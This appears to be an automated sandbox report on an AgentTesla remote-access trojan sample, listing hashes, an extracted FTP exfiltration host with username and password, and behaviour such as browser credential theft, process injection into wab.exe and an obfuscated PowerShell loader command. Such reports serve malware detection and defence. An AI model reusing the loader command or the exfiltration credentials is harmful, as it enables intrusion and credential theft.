Analysis
-
max time kernel
144s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
11-09-2024 14:35
Static task
static1
Behavioral task
behavioral1
Sample
3.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
3.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240802-en
General
-
Target
3.exe
-
Size
1.2MB
-
MD5
ec91d57cb541b3d5867b4972b0883f44
-
SHA1
77a05550a12646964b23404fca934e6dad232d6e
-
SHA256
0d51cc75a747abb0b17f859c228b2c15dfea604e90172af3571aa78183a654e8
-
SHA512
84c8d5cc8d5eaf91a5f7b25eca2d0916dad5c39da9d01375bf7d328c2f8251fad6d57700fa249de03876ffa463c6f85102aa796b02741cd3f6b2602e5a469b88
-
SSDEEP
24576:IPty3zTcFJHXIh+8xHBe7JvIKSpcG/pQd:IPQ3zTUXMxHYYpcG/2
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://mail.hearing-vision.com - Port:
21 - Username:
[email protected] - Password:
LILKOOLL14!
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Loads dropped DLL 1 IoCs
pid Process 2876 3.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 28 ip-api.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 3820 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4788 powershell.exe 3820 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4788 set thread context of 3820 4788 powershell.exe 96 -
pid Process 4788 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 4788 powershell.exe 4788 powershell.exe 4788 powershell.exe 4788 powershell.exe 4788 powershell.exe 4788 powershell.exe 4788 powershell.exe 4788 powershell.exe 4788 powershell.exe 3820 wab.exe 3820 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4788 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4788 powershell.exe Token: SeDebugPrivilege 3820 wab.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2876 wrote to memory of 4788 2876 3.exe 86 PID 2876 wrote to memory of 4788 2876 3.exe 86 PID 2876 wrote to memory of 4788 2876 3.exe 86 PID 4788 wrote to memory of 3820 4788 powershell.exe 96 PID 4788 wrote to memory of 3820 4788 powershell.exe 96 PID 4788 wrote to memory of 3820 4788 powershell.exe 96 PID 4788 wrote to memory of 3820 4788 powershell.exe 96 PID 4788 wrote to memory of 3820 4788 powershell.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle minimized "$Broses221=Get-Content 'C:\Users\Admin\AppData\Local\Slukredes\Geografiskes.Erf';$Mouseweb=$Broses221.SubString(54605,3);.$Mouseweb($Broses221)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3820
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53KB
MD50fef6b3f78d915fa4307efa58ffb5122
SHA10df19588d9258680a1b80296c339d5a328e3cf88
SHA2566dcf1c387ffb2a9962064095e253bb0c4da38ff01a9eef7f93e4a394d979df8d
SHA512cc81f788d0855c2b849030710657df68781900739c66a714a58428b8282c48be013d4c8ed83fc694283e089ad3d7dc2e36965d1c7055cc3e9104a0d88741f2e5
-
Filesize
310KB
MD5d8b6278f553a79e96b828eb46c8eb49a
SHA1024a687424bd4cb643a6d3cd582d108b25e95615
SHA25663b873e594bf0f10a114779a7181b839134d62eef37cc13a3f501132b76f6e46
SHA512df6dc3f1783474424e61252626fe54b2b850b276b51c0fc08a2ea4cbdf647a4dfc0a0068235c0135c92eb2ad7969c55aadbae85afaac87f5fd996d7acb2e13fe
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD5b38561661a7164e3bbb04edc3718fe89
SHA1f13c873c8db121ba21244b1e9a457204360d543f
SHA256c2c88e4a32c734b0cb4ae507c1a9a1b417a2375079111fb1b35fab23aedd41d9
SHA512fedcaac20722de3519382011ccf22314af3edcd11b69f814db14710966853b69b9b5fc98383edcdb64d050ff825264eaba27b1c5adfe61d1fc9d77f13a052ced